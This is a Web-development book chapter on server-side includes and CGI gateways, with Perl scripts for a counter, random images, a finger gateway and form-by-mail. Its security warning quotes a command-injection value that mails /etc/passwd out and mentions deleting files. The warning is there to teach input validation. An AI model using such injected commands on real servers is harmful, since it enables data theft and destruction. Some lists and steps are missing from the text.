This chapter covers the use of server-side includes (commonly known as SSI) and World Wide Web gateways, which are special purpose programs that perform some actions and output results in HTML. We discuss how to improve prewritten gateways and how to develop custom gateways for your own use.
Both techniques enable Web developers to go beyond normal static HTML pages. SSI is a simple mechanism of dynamically creating Web pages in which the information changes every time the page is requested.
A gateway is a program that gathers and converts information from different sources so that it can be used by a person or another program. A Web gateway is a program that converts information so that a Web browser can display it. These special programs can be written in virtually any computer language and can handle tasks as simple as converting finger information or as complex as talking to a mail server or handling database queries. One could imagine many ways for servers and gateways to communicate, but the Common Gateway Interface (CGI) arose as the standard mechanism for information exchange between Web servers and other programs.
In fact, both techniques allow the Web to be a complete platform for presenting information of different natures. It may be static images, video, or text, but also information originating from other Internet tools or services. Everything is integrated in a more dynamic and interactive way! By using SSI and gateways, the Web becomes the major platform for accessing the Internet. The Web expansion figures prove it already! The following list shows the number of estimated WWW hosts on the Internet (figures provided by Network Wizards, http://www.nw.com/):
Server-side includes (SSI) define a special set of tags (also called directives) that can be embedded in the HTML source of documents and are preprocessed by the Web server before they are sent to the client, the Web browser. Think of SSI as special bits of programs (or, more correctly, the names of programs) embedded in HTML pages. Instead of sending just the source of the page, the Web server searches for these special tags, executes the code it finds, replacing the tag with the output of the program, and then finally sends the page to the Web browser. The SSI tags are never sent to the browser and are always replaced by data (in some cases, data may be empty).
The format of an SSI tag or directive is
<!--#command argument="value"-->
where
Each tag corresponds to an action executed directly by the server or by a program the server must call.
Notice that the SSI tag starts with <!-- and ends with -->, as do comments embedded in HTML pages. This design decision allows for servers and clients to ignore the tag if SSI functionality is not used. If the Web server allows SSI functionality, it parses the document and replaces any SSI tag by the output of the corresponding program, leaving other comments as they are.
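To make the substitution step more concrete, here is a minimal sketch in Perl of what a server (or a helper script such as fakessi) might do with a page. It handles only the standard echo directive, and the helper name expand_ssi is hypothetical; a real server supports more commands and does considerably more checking.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: expand <!--#echo var="NAME"--> tags in $html using
# the values in %$vars. Unknown variables become an empty string, and
# ordinary HTML comments are left untouched.
sub expand_ssi {
    my ($html, $vars) = @_;
    $html =~ s{<!--#echo\s+var="([^"]*)"\s*-->}
              {defined $vars->{$1} ? $vars->{$1} : ''}ge;
    return $html;
}

my $page = qq{<!-- a normal comment -->\n}
         . qq{<P>You requested <!--#echo var="DOCUMENT_URI"-->.</P>\n};

# The SSI tag is replaced; the normal comment is sent as it is
print expand_ssi($page, { DOCUMENT_URI => '/index.shtml' });
```

Because the tag looks like a comment, a page that is not parsed at all still displays correctly; the browser simply ignores the tag.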
See the list of possible SSI tags later in this chapter, in the section "A List of Useful SSI Directives."
The difference between SSI and, for example, Java or JavaScript is that the program code is executed on the server side instead of the client side. There has been a lot of discussion about which strategy is better, but both have their own qualities and pitfalls. The main advantages of the SSI approach follow:
As you may have guessed, there are some disadvantages, too:
The bottom line is that you should use SSI when and where you really need it. Lots of times, SSI is the most suited solution for a given problem, but sometimes there may be a better way to do things.
Well, this all seems fine, but what are server-side includes useful for? Server-side functionality in general and server-side includes in particular allow applications as simple as a visitor counter or as complex as a database query to be displayed inside an HTML page.
Although SSI allows the embedding of the output of lots of different programs or actions in a page, the most commonly used programs produce the following results:
SSI applications are, in fact, special purpose programs that run on the server side in order to produce a Web page (or part of it, really) before it is sent to a browser. CGI is an interface specification designed to allow Web servers and other programs to interact. It defines what the program should expect as information from the server and what and how it should send data to the Web server.
SSI does not require (but can make use of) any external interface and is generally easier to implement than CGI or other proprietary solutions (by the use of a proprietary Application Programming Interface (API), for example). For example, SSI programs do not receive input through the stdin (standard input), as do CGI scripts (when the POST method is used). Just think of SSI applications as programs that do not need to worry about the context in which they are running and that just need to output the correct results.
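For comparison, the following sketch shows the input handling that a CGI script has to do and that an SSI program can usually skip. It relies on the standard CGI environment variables REQUEST_METHOD, CONTENT_LENGTH, and QUERY_STRING; the helper names raw_form_data and parse_form_data are hypothetical, and libraries such as cgi-lib.pl do the same job more thoroughly.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return the raw, still URL-encoded request data.
# $env is a reference to the environment (normally \%ENV) and $in is the
# filehandle to read a POST body from (normally \*STDIN).
sub raw_form_data {
    my ($env, $in) = @_;
    my $method = $env->{REQUEST_METHOD} || 'GET';
    if ($method eq 'POST') {
        my $length = $env->{CONTENT_LENGTH} || 0;
        my $data = '';
        read($in, $data, $length) if $length > 0;
        return $data;
    }
    return defined $env->{QUERY_STRING} ? $env->{QUERY_STRING} : '';
}

# Hypothetical helper: split "a=1&b=two+words" into a hash, decoding
# + signs and %XX escapes in both names and values.
sub parse_form_data {
    my ($raw) = @_;
    my %form;
    foreach my $pair (split /&/, $raw) {
        next if $pair eq '';
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        foreach ($name, $value) {
            tr/+/ /;
            s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
        }
        $form{$name} = $value;
    }
    return %form;
}

my %demo = parse_form_data('email=user%40server&note=two+words');
print "$demo{email}: $demo{note}\n";
```

In a real CGI script you would call raw_form_data(\%ENV, \*STDIN) once at the start and pass the result to parse_form_data.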
The common characteristic between SSI and CGIs is that both are techniques for server-side execution, and most of the time the computer language used to produce CGI and SSI programs is the same. Remember Perl? Being a Perl addict, most of the SSI programs I develop myself are done with this language. But, sometimes, when speed of execution or server overload becomes an issue, we should consider alternatives, preferably compiled languages (not interpreted) such as C.
Also, when viewing a document source, you don't generally notice SSI, but you notice CGI script calls. When the browser receives the page, every SSI tag has been replaced by the corresponding action output; however, CGI script calls stay as they are because the script is still going to be executed, generally by pressing a form submit button.
Most modern Web servers support SSI, but I will cover only two of them: Apache and CERN.
The reason for this choice is that both servers are freely available to everyone and are used in many Web server platforms around the world.
Tip: You can find lots of statistics about Web servers' usage at http://www.netcraft.com/survey/
In fact, it was the NCSA HTTPD that first introduced the SSI feature. This section covers the use of SSI on the Apache and CERN servers, but most of the principles apply to other servers, as well (at least NCSA and Sioux, two near cousins of Apache). Apache is, according to the latest figures, the most used Web server in the world and was created as an evolution of NCSA. The CERN server was created in the birthplace of the Web, the CERN (European Center for Nuclear Physics Research) laboratory in Geneva, Switzerland.
The CERN server, one of the oldest around, now called W3 server, does not support SSI. But there is a way around this, as with everything in computer science, called fakessi. fakessi is a special script in Perl (we could imagine it in C or another language) that works alongside the CERN server and provides the SSI functionality. Although limited in features and more performance demanding, this is a nice script that could help many people still using this server.
Not only do you need a Web server that supports SSI, you must also configure it accordingly. It is up to the Webmaster to decide whether or not to support SSI, even if the server used supports the feature. In particular, the Webmaster must decide which documents are parsed and which ones are not. Parsing is the action of searching through a file (HTML in this case) for the SSI directives. Sure, you can configure your server to parse every page sent, but this is not generally a good idea because it overloads a server considerably. A common configuration is to name the files that will be parsed with the .shtml extension and tell the server to parse only these. Normal .html files will not be parsed this way. The Apache server introduced a new trick that consists of turning on the x bit for the file you want to parse (on UNIX platforms, chmod u+x turns on the owner's execute bit without changing the file's other permissions). This way, you can let all your normal files have the .html extension and turn on the x bit for those you want to parse for SSI directives. I personally prefer the second solution because there is no need to worry about different file extensions (and, consequently, new MIME types), but either solution is better than letting the server parse all your .html files!
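The two conventions can be summarized in a few lines of Perl. This is only a sketch of the decision, not the server's actual code; the helper name should_parse_for_ssi is hypothetical, and it assumes that the x bit in question is the owner's execute bit (octal 0100).

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper mirroring the two conventions: parse a file if its
# name ends in .shtml, or if it is an .html file whose owner-execute bit
# (octal 0100) is set. $mode is the permission mode as returned by stat().
sub should_parse_for_ssi {
    my ($filename, $mode) = @_;
    return 1 if $filename =~ /\.shtml$/;
    return 1 if $filename =~ /\.html$/ && ($mode & 0100);
    return 0;
}

foreach my $case (['news.shtml', 0644], ['index.html', 0744], ['plain.html', 0644]) {
    my ($name, $mode) = @$case;
    printf "%-12s %s\n", $name, should_parse_for_ssi($name, $mode) ? 'parsed' : 'sent as is';
}
```

For a real file, the mode can be obtained with (stat $path)[2].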
The CERN server does not originally support the use of SSI. A way around this is to use a program sitting alongside the server that parses the pages itself but asks the server to send them to the client. So, you must also tell the server to pass the files to this program before sending them to the client.
There are several scripts available on the Internet to allow the use of SSI with the CERN server, but one of the most used is called fakessi.pl, a Perl script that you can find at http://sw.cse.bris.ac.uk/WebTools/fakessi.html.
Here are the steps for installing fakessi.pl:
The preceding configuration is the preferred one, but you can configure the CERN server to parse all your .html files with the directive Exec /*.html /cgi-bin/fakessi.pl. Be careful about using /* instead of /*.html because with this, all the files would be parsed, even graphics files! The fakessi.pl script is reported not to work well with this kind of parsing.
From the beginning, Apache was designed to provide SSI functionality. Configuring this server in order to actually use it is quite simple:
You have just configured the Apache server to parse .shtml files and files with the x bit on. You could use only one of these alternatives if you prefer, by omitting either the XBitHack or the AddType .shtml directive. In order to test the SSI feature, you should create an .shtml file or an .html file with the execution attribute (x bit) turned on (chmod u+x the file on UNIX systems).
As you have seen previously, the format of an SSI directive is
<!--#command argument="value"-->
Following is the list of the six possible commands available in SSI, along with the arguments and values they allow:
Figure 7.1: The HTML source of the document displaying a navigation bar.
Figure 7.2: A page with a navigation bar.
Having seen the various possibilities for SSI directives, let's take a look at two examples: a visitor counter and a random image generator.
For both examples, we will present the program listing, the SSI tags, and the resulting page.
Because both programs are expected to output HTML text, they must inform the server using the Content-Type: text/html MIME header followed by two newline characters (represented by \n, usually) before the actual result. Don't forget to output the correct MIME header each time you develop a script that will be used by an exec SSI directive; otherwise, your Web server could output an error message instead of the desired result.
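As a minimal sketch of this rule, the following program does nothing but print the header, the blank line, and a small HTML fragment. The helper name ssi_response and the fragment itself are only illustrations.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Build the complete response an SSI exec program is expected to print:
# the MIME header, a blank line, and then the HTML fragment itself.
sub ssi_response {
    my ($fragment) = @_;
    return "Content-Type: text/html\n\n" . $fragment;
}

# Hypothetical example: report when the page was generated
print ssi_response("<I>Page generated on " . scalar(localtime) . "</I>\n");
```

Running the script from the command line is a quick way to check that the header really is the first thing it prints.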
A visitor counter is probably the most used SSI feature; at least, it is one of the most desired. See for yourself on the comp.infosystems.www.authoring.* groups. The aim of this SSI tag and corresponding script is to display the actual page with a counter embedded (in the top or in the bottom, usually), updated each time someone requests the page.
The SSI part is only the tag
<!--#exec cgi="/cgi-bin/counter.cgi"-->
which you should insert in your HTML document in the place you want the counter to appear. You can complete it with the surrounding string
Welcome, you are the user number
<!--#exec cgi="/cgi-bin/counter.cgi"-->
to visit these pages!
Then, there is the counter program itself, which is called counter.cgi. It is executed each time the page is requested. For this example, I have chosen to develop a simple script (see Listing 7.1) in Perl. The $count_file variable (see the beginning of Listing 7.1) should have the complete path to the file that keeps the counts, for example, /usr/local/etc/httpd/logs/count_file.
Listing 7.1. The counter script in Perl.
#!/usr/bin/perl
#
# counter.cgi - A simple visitor counter
#
# [email protected], March 96

# Place the file in a directory which the web server can access
$count_file = "/somewhere/count_file";

$doc = $ENV{'DOCUMENT_URI'};   # HTTP_REFERER works for CERN server

# If it was called from the command line, treat it as a test run
if ($doc eq "") { $doc = "experience" }

# Aliases for the Homepage
if ($doc eq "/index.html") { $doc = "/" }

# Open the count file for reading and appending (creating it if needed)
# and lock it before reading, so simultaneous requests cannot lose updates
open(CFILE, "+>>$count_file") || die "Cannot open $count_file: $!\n";
flock(CFILE, 2);       # exclusive lock
seek(CFILE, 0, 0);     # rewind to read the existing counts
@counts = <CFILE>;

# Pick the correct entry and increment it
$found = 0;
for $line (@counts) {
    chomp($line);
    ($page, $count) = split(/ /, $line);
    $page =~ s/'//g;
    if ($page eq $doc) {
        $count++;
        $found = 1;
        $line = "'$page' $count";
        $found_count = $count;
    }
    push(@newcount, $line);
}
if ($found == 1) {
    $count = $found_count;
} else {
    $count = 1;
    push(@newcount, "'$doc' 1");
}
@newcount = sort(@newcount);

# Rewrite the count file while still holding the lock
seek(CFILE, 0, 0);
truncate(CFILE, 0);
for $line (@newcount) { print CFILE "$line\n"; }
close(CFILE);          # closing the file flushes it and releases the lock

print "Content-Type: text/html\n\n";
print "$count";
### End of counter.cgi ###
Type in the script in Listing 7.1 and save it in your cgi-bin directory. Configure your server in order to provide SSI functionality (or ask your Webmaster to do it for you) and insert the previously shown SSI tag into your page. Then, use your favorite browser and open the page. You should be presented with the result shown in Figure 7.3.
Figure 7.3: The output of a visitor counter script.
Note: If you don't get the results shown in Figure 7.3, make sure that
The corresponding HTML source is in Figure 7.4.
Figure 7.4: The HTML source with the SSI tag for the counter script.
The script randimg.cgi presented here offers the possibility of randomly inserting an image inside an HTML page. It is more a random image tag generator than a random image generator, in fact (it is the tag that is generated by the script, not the image itself). This feature is used in a lot of well known Web pages. Yahoo! and Lycos, for example, use it to display random advertisements on their search pages. Follow these steps to install the randimg.cgi script on your server:
Listing 7.2. A random image tag generator script in Perl.
#!/usr/bin/perl
#
# randimg.cgi - Random image tag generator
#
# [email protected], March 1996
### Number of images
$total = 2;
### Relative paths of each image
@images = ("/Images/hello.gif", "/Images/hi.gif");
### ALT tag for each image
@alt = ("Hello", "Hi, how are you?");
### Link for each image
@link = ("http://www.esoterica.pt/newbie/", "http://www.somewhere.com/");
srand;
$number = int(rand($total));
print "Content-Type: text/html\n\n";
print "<A HREF=\"$link[$number]\"><IMG SRC=\"$images[$number]\" ALT=\"$alt[$number]\" BORDER=0></A>";
Imagine that you want to display a random image but also log the number of times users actually click on a given image. If the URL you have defined for an image points to a remote site, you have no way of knowing whether your advertisements really catch a user's attention. One possible improvement to this script is to have the URLs point to another script on your system: a script that receives a URL, saves or counts it in a file, and then redirects the Web browser to that same URL (using the Location: header as the output of the script).
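A minimal sketch of such a redirecting script might look like the following. It assumes the destination URL arrives in the query string; the list of allowed destinations, the helper names, and the log file path /tmp/clicks.log are hypothetical and should be adapted to your system.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical list of destinations this script is willing to redirect to.
# Restricting the targets keeps the script from being used to bounce
# visitors to arbitrary sites.
my %allowed = map { $_ => 1 } (
    'http://www.esoterica.pt/newbie/',
    'http://www.somewhere.com/',
);

# Return the CGI response for a requested URL: a Location: header for a
# known destination, or a short error page otherwise.
sub redirect_response {
    my ($target) = @_;
    if (defined $target && $allowed{$target}) {
        return "Location: $target\n\n";
    }
    return "Content-Type: text/html\n\n<P>Unknown destination.</P>\n";
}

# Append one line per click to a log file; returns 0 if it cannot be opened.
sub log_click {
    my ($logfile, $target) = @_;
    open(my $log, '>>', $logfile) or return 0;
    flock($log, 2);                       # exclusive lock while writing
    print {$log} scalar(localtime), " $target\n";
    close($log);
    return 1;
}

my $target = $ENV{QUERY_STRING};
log_click('/tmp/clicks.log', $target) if defined $target && $allowed{$target};
print redirect_response($target);
```

The links produced by randimg.cgi would then point to this script, with the real destination after the ? sign, instead of pointing to the remote site directly.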
The HyperText Transfer Protocol (HTTP) was designed for the transfer of pages between programs called clients and servers. The client is the entity requesting a given document and is what we usually call the browser (in the context of the World Wide Web). The server is responsible for replying to a client's demands, and it is up to the server to find and send a given page. The usual functioning is as follows:
Although adequate for the task it was designed for (the transfer of hypertext pages), HTTP does not cover other Internet users' needs, such as reading mail or getting information about other users with finger, which is perfectly normal. HTTP is also a stateless protocol: the server forgets any information it may have about the client (user), even if the client asked for a page a few seconds before.
The HTTP protocol limits the possibilities and usefulness of the Web as an integrated Internet access platform because many things we expect to use are not available through the Web. Sure, the Web could live by itself, and it would already be a very interesting and appealing Internet service. But the need to integrate other protocols and functions arose, and gateways are the answer to the problem.
As the name suggests, a gateway is a program that functions as an interface between two systems. In this case, on one side there is the Web and its HTTP protocol, and on the other side there are other Internet protocols or applications. The gateway is the solution, providing the Internet user and its browser a picture of both sides.
Gateways are no more than specially designed programs in any computer language (C, Perl, shell scripts, and so on), respecting the CGI specification or some proprietary API specification. In order to develop a gateway, one needs to know the CGI specification (methods of calling the scripts, variables passed by the server, format of the output, and so on) but also the protocol or program to which the gateway will be talking. This can be as simple as using a finger or archie program, or as complex as talking to a mail or news server. Before starting to develop your own gateways, you should search the Internet for pre-written gateways because virtually anything you might think of has already been handled by someone on the other side of the world. Welcome to the Internet!
In fact, some gateways come standard with the Web server software (in the cgi-bin directory) and are ready to use. The Apache server, for example, comes with a finger, wais, and archie gateway (among others) that you only need to customize to reflect your system settings.
To improve existing gateways, you must first search for them. You can have a look at the tools available in your cgi-bin directory or check out a search engine or Internet index site if you need a specific gateway.
Improvement of prewritten gateways can be done in several ways:
While the editing to suit your settings is mandatory and the improvement of the presentation is optional but frequently useful, the addition of new functions is the most complex task. You need to fully understand the existing gateway code if you want to add a new feature. Imagine that you have found a mail gateway that allows the reading of mail messages from a Web page, and you think that deleting a message from your mailbox would be a nice feature to integrate in the gateway. So, you need to understand the mail protocol (POP in general), but you also need to read and understand the code of the gateway in order to introduce alterations.
This section covers some examples of gateways that could be used in the World Wide Web. Both examples presented here are custom developed but exist in several different variations on the Internet.
The finger program is useful to find information, by using an e-mail address, about someone on the Internet. In general, we can get a person's name, the last login time, and if he or she has received mail lately. If you don't use a Web gateway, you must either use a shell in a UNIX platform (with the telnet program) in order to issue the finger command or use a finger client on your personal computer. On the other side (the remote server), the finger server waits for requests and sends information about a user.
The use of finger through the Web has a lot more potential. Just think of the display capabilities of a Web browser. It is possible to include some HTML tags on the finger information so that when others use finger to check your e-mail address, they actually see an attractive information page about you.
In a UNIX environment, the finger server reads the .plan and .project files placed in each user's home directory and displays their contents. So, you can edit your .plan file (by opening a telnet session on the server or by editing it at home and transferring it with an FTP program) and put in something such as
<H1 ALIGN=center>Hello, it is me, look </H1>
<IMG SRC="/~amcf/photo.gif">
which would display the sentence and the photo indicated by the <IMG SRC> tag.
The finger gateway presented in Listing 7.3 allows users to retrieve and display this kind of personal information inside a Web page (along with other data that the finger server sends).
In order to use this script, you must install it in your cgi-bin directory and then call the corresponding URL, /cgi-bin/finger.cgi. There is no need to develop a separate page to let users enter the e-mail address they want information about because the script is intelligent enough to display the main page itself.
Listing 7.3. The finger gateway.
#!/usr/bin/perl
require '/usr/lib/cgi-lib.pl'; # The useful cgi-lib

##### Paths, binaries and system specific information #####
$url = '/cgi-bin/finger.cgi';  # finger URL
$finger = '/usr/bin/finger';   # Path for the finger client program

&ReadParse(*input);   # cgi-lib, constructs list of key=value form data
print &PrintHeader(); # cgi-lib, prints header "Content-type: text/html\n\n"
if (&MethGet()) {     # GET was used, so...
    &InitialForm();   # ... present the initial form
} else {              # POST was used so process the query
    &Finger();
}
exit(0);

##### Presents initial form #####
sub InitialForm {
    print <<EOM;
<HTML>
<HEAD>
<TITLE>Finger</TITLE>
</HEAD>
<BODY>
<H1 ALIGN=center>Finger</H1>
<P>
This page allows you to use a finger client and discover information
about an email address.
</P>
<FORM ACTION="$url" METHOD=post>
<P ALIGN=center>Email address: <INPUT NAME=email VALUE=""></P>
<P ALIGN=center><INPUT TYPE=submit VALUE="Go Get It"></P>
</FORM>
</BODY>
</HTML>
EOM
}

##### Runs the finger client for the submitted address and shows the result #####
sub Finger {
    $email = $input{'email'};
    # Refuse anything other than letters, digits, _ - . and @
    if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
        $_ = "The email address should be in the form <I>user\@server</I>!";
    } else {
        # Backticks run the command and capture its output
        $_ = `$finger $email`;
    }
    print <<EOM;
<HTML>
<HEAD>
<TITLE>Finger: $email</TITLE>
</HEAD>
<BODY>
<H2 ALIGN=center>Finger: $email</H2>
<PRE>
$_
</PRE>
</BODY>
</HTML>
EOM
}
The cgi-lib.pl used by this script (see the require command at the top of Listing 7.3) is a useful CGI library for Perl programs and can be found at http://www.bio.cam.ac.uk/web/. It is very often used in CGI scripts. I suggest you download a copy and keep it handy because you will need it often.
Also, notice the verification of user input:
if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
Warning: Be very careful when you create a script that passes arguments to other programs or issues shell commands! If the input were not checked for illegal characters, a cracker could easily exploit this hole. A cracker could, for example, send the file containing the list of users' passwords on the server to his or her own mailbox by entering something ; mail [email protected] < /etc/passwd as the e-mail address! Or, even worse, the cracker could delete files belonging to the user that runs the Web server by using the rm (remove file) command instead of the mail command! The golden rule is: Always verify the user's input and allow only what is strictly necessary.
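Checking the input is one line of defense; another is to avoid the shell altogether. The following sketch combines both, assuming a Perl version that supports the list form of a piped open (Perl 5.8 or later on UNIX platforms). The helper names is_safe_address and run_lookup are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Accept only addresses made of letters, digits, and _ . @ - that do not
# start with a dash (so the value cannot be mistaken for an option).
sub is_safe_address {
    my ($email) = @_;
    return 0 unless defined $email && length $email;
    return $email =~ /\A[a-zA-Z0-9_.@][a-zA-Z0-9_.@-]*\z/ ? 1 : 0;
}

# Run a program with the address as its only argument. The list form of
# open hands the arguments directly to the program, without a shell, so
# characters such as ; and < have no special meaning.
sub run_lookup {
    my ($program, $email) = @_;
    return undef unless is_safe_address($email);
    open(my $out, '-|', $program, $email) or return undef;
    my @lines = <$out>;
    close($out);
    return join '', @lines;
}

print is_safe_address('user@server') ? "accepted\n" : "refused\n";
print is_safe_address('something ; mail x < /etc/passwd') ? "accepted\n" : "refused\n";
```

In the finger gateway, run_lookup('/usr/bin/finger', $email) could take the place of the backticks.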
The gateway presented in Listing 7.4 acts as an intermediary between the Web server and a mail program. It is useful for sending form results by e-mail. One of the uses for this, for example, is a comments page in which users visiting your Web pages can leave their comments or questions.
This script should be called from the form page with the POST method:
<FORM ACTION="/cgi-bin/mailform?user@server?subject" METHOD=post>
The e-mail address where the form should be sent to is specified in user@server, and the subject should go just after it. Both arguments are separated by a ? sign. If the form has a field called email, the script will send the form results with the From: and Reply-To: lines containing the correct e-mail address, so you can use the reply function of your mail reader program to answer the user's questions. If there is no field called email on the form, the script will send the mail as if it came from the user who runs the Web server (usually nobody or webmaster). See Figure 7.5 for an example of an HTML form that uses the mailform script.
Figure 7.5: The HTML source of a form page.
Listing 7.4. A form-by-mail script called mailform.
#!/usr/bin/perl
###########################################################################
# mailform.pl 1.0 - A simple form-by-mail script                          #
#                                                                         #
# How does it work?                                                       #
# It gets data from an HTML form and sends all the field values to the    #
# address specified as the first parameter of the script.                 #
#                                                                         #
# Special field on form named "email" is used for the Reply-To header.    #
#                                                                         #
# Antonio Ferreira                                                        #
# [email protected]                                                       #
#                                                                         #
# March 1996                                                              #
###########################################################################
require '/usr/lib/cgi-lib.pl'; # The useful cgi-lib
######################### Variable initialization ########################
##### Paths, binaries and system specific information #####
$url = 'http://www.esoterica.pt/cgi-bin/mailform.pl'; # mailform URL
$sendmail = '/usr/bin/smail'; # Path and parameters for the mailer
$mailserver = 'mail.esoterica.pt'; # Complete mail server hostname
########################## Start of Main Program ##########################
&ReadParse(*input); # cgi-lib, constructs list of key=value form data
print &PrintHeader(); # cgi-lib, prints header "Content-type: text/html\n\n"
($destaddr, $subject, $garbage) = split(/\?/, $ENV{'QUERY_STRING'});
if (&MethGet()) {
    print <<EOM;
<HTML>
<HEAD>
<TITLE>Message not sent</TITLE>
</HEAD>
<BODY>
The message should be sent with the <B>POST</B> method!
</BODY>
</HTML>
EOM
} else {
    # The address is passed to the mailer on a command line, so accept
    # only the characters that a plain user@server address needs
    if ($destaddr eq '' || $destaddr =~ /[^a-zA-Z0-9_\-\.@]/) {
        print <<EOM;
<HTML>
<HEAD>
<TITLE>Message not sent</TITLE>
</HEAD>
<BODY>
The message did not have a valid destination address.
</BODY>
</HTML>
EOM
    } else {
        &SendForm();
    }
}
exit(0);
########################## End of Main Program ##########################
#################### Start of subroutines definitions ###################
##### Uses the mailer defined to send the reply #####
sub SendForm {
    $fromurl = $ENV{'HTTP_REFERER'};
    $fromhost = $ENV{'REMOTE_HOST'};
    if ($subject eq '') {
        $subject = $fromurl;
    }
    if ($input{'email'} eq '') {
        $fromaddr = 'www';
    } else {
        $fromaddr = $input{'email'};
    }
    # Keep line breaks out of the header values so that form data
    # cannot add extra mail headers
    $subject =~ s/[\r\n]+/ /g;
    $fromaddr =~ s/[\r\n]+/ /g;

    open(MAIL, "| $sendmail \"$destaddr\"");
    # The empty line before EOM separates the mail headers from the body
    print MAIL <<EOM;
From: $fromaddr
To: $destaddr
Reply-To: $fromaddr
Subject: $subject
X-Mail-Program: Mailform
URL: $fromurl
SERVIDOR: $fromhost

EOM
    foreach $field (@input) {
        # Each entry has the form name=value; the name ends at the first = sign
        ($name) = ($field =~ /^([^=]+)=/);
        print MAIL "-=-=- $name -=-=-\n";
        print MAIL "$input{$name}\n";
    }
    close(MAIL);
    print <<EOM;
<HTML>
<HEAD>
<TITLE>Message sent</TITLE>
</HEAD>
<BODY>
<H2 ALIGN=center>Your message was sent to $destaddr!</H2>
</BODY>
</HTML>
EOM
}
The HTML source presented in Figure 7.5 corresponds to the FORM in Figure 7.6. This figure shows what the user sees in his or her browser.
Figure 7.6: The form that will be sent by mail.
When the user presses the button Send It, the form will be sent by mail and will arrive at its destination mailbox. The received mail message will be similar to the one presented in Figure 7.7.
Figure 7.7: The message that arrived in the mailbox.
Lots of other examples could be given here, but we'll let you explore further. There are many gateways out there waiting for you to improve them: finger, wais, archie, uptime, passwd, mail, news, and so on. Explore the programs or protocols first and then modify the corresponding gateways to suit your needs.
When I first became familiar with the Web and then with CGI and gateways, I started thinking to myself: "Wow, the Web is great, and I'll use it to do everything I have ever dreamed of doing on the Internet!" Yes and no. The Web is really great, and it is actually the most suitable platform for integrating most Internet services or functions. But there are some protocols that simply cannot be integrated in Web pages through the use of gateways or similar mechanisms because their original design is incompatible with the Web.
One such example is the telnet protocol. This protocol is highly interactive and does not fit within the client/server connect-and-send-on-demand architecture of the HTTP protocol and the Web. During a telnet connection, the user screen and the telnet server must be connected without interruption so the user can type characters on the keyboard and immediately see results on the screen. How could that be done in a Web page? We could imagine a Web page that would be reloaded each time the user presses a key or each time there are results coming from the telnet server, but that would be practically impossible to accomplish due to performance considerations and design difficulties on the server side. What is possible is the integration of a telnet capable program within a Web browser so that we can telnet from a Web page. But that would be more a telnet screen than a Web page.
Another example is ping, which is used to test whether a machine is alive and well. The client sends ICMP echo request packets, and the remote machine replies as soon as it receives them. Generally, ping programs send and receive packets until we stop them deliberately, which causes a problem because a result HTML page can be produced only when the program finishes with no user intervention. So, one must use a ping program that sends and receives a fixed number of packets and, as soon as it finishes, sends results back to be displayed in an HTML page.
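A gateway along these lines could be sketched as follows. The -c option (number of packets) and the path /bin/ping are assumptions: they are common on Linux and BSD systems, but other ping programs use different options. The helper names ping_command and ping_page are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Build the argument list for a ping that stops by itself after $count
# packets. Returns an empty list if the host name or the count looks wrong.
sub ping_command {
    my ($host, $count) = @_;
    return () unless defined $host  && $host  =~ /\A[a-zA-Z0-9][a-zA-Z0-9.-]*\z/;
    return () unless defined $count && $count =~ /\A[0-9]+\z/
                     && $count >= 1 && $count <= 10;
    return ('/bin/ping', '-c', $count, $host);   # path and -c are assumptions
}

# Run the command without a shell and wrap its output for a Web page.
sub ping_page {
    my @cmd = ping_command(@_);
    my $header = "Content-Type: text/html\n\n";
    return $header . "<P>Invalid request.</P>\n" unless @cmd;
    open(my $out, '-|', @cmd) or return $header . "<P>Could not run ping.</P>\n";
    my $result = join '', <$out>;
    close($out);
    # Escape the characters that have a special meaning in HTML
    $result =~ s/&/&amp;/g;
    $result =~ s/</&lt;/g;
    return $header . "<PRE>\n$result</PRE>\n";
}

print join(' ', ping_command('www.example.com', 4)), "\n";
```

Because the number of packets is fixed and bounded, the program always finishes by itself, and the page can be sent to the browser as soon as it does.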
Fortunately, many other protocols can be integrated through the use of a gateway. For example, there are mail and news gateways that allow reading of mail and news, respectively, as well as database gateways that allow querying from a Web page.
The World Wide Web is evolving as the most powerful, cross-platform, independent, distributed, and hypermedia mechanism for information retrieval. Gateways can only help the Web expand even more in order to become the platform for Internet access. Stay tuned!
This chapter covered server-side includes and World-Wide Web gateways. Both mechanisms help you extend your Web server functionality and consequently improve the richness of the information you want to show to other users. You have learned how to use both SSI and gateways and how to develop custom solutions for your own use.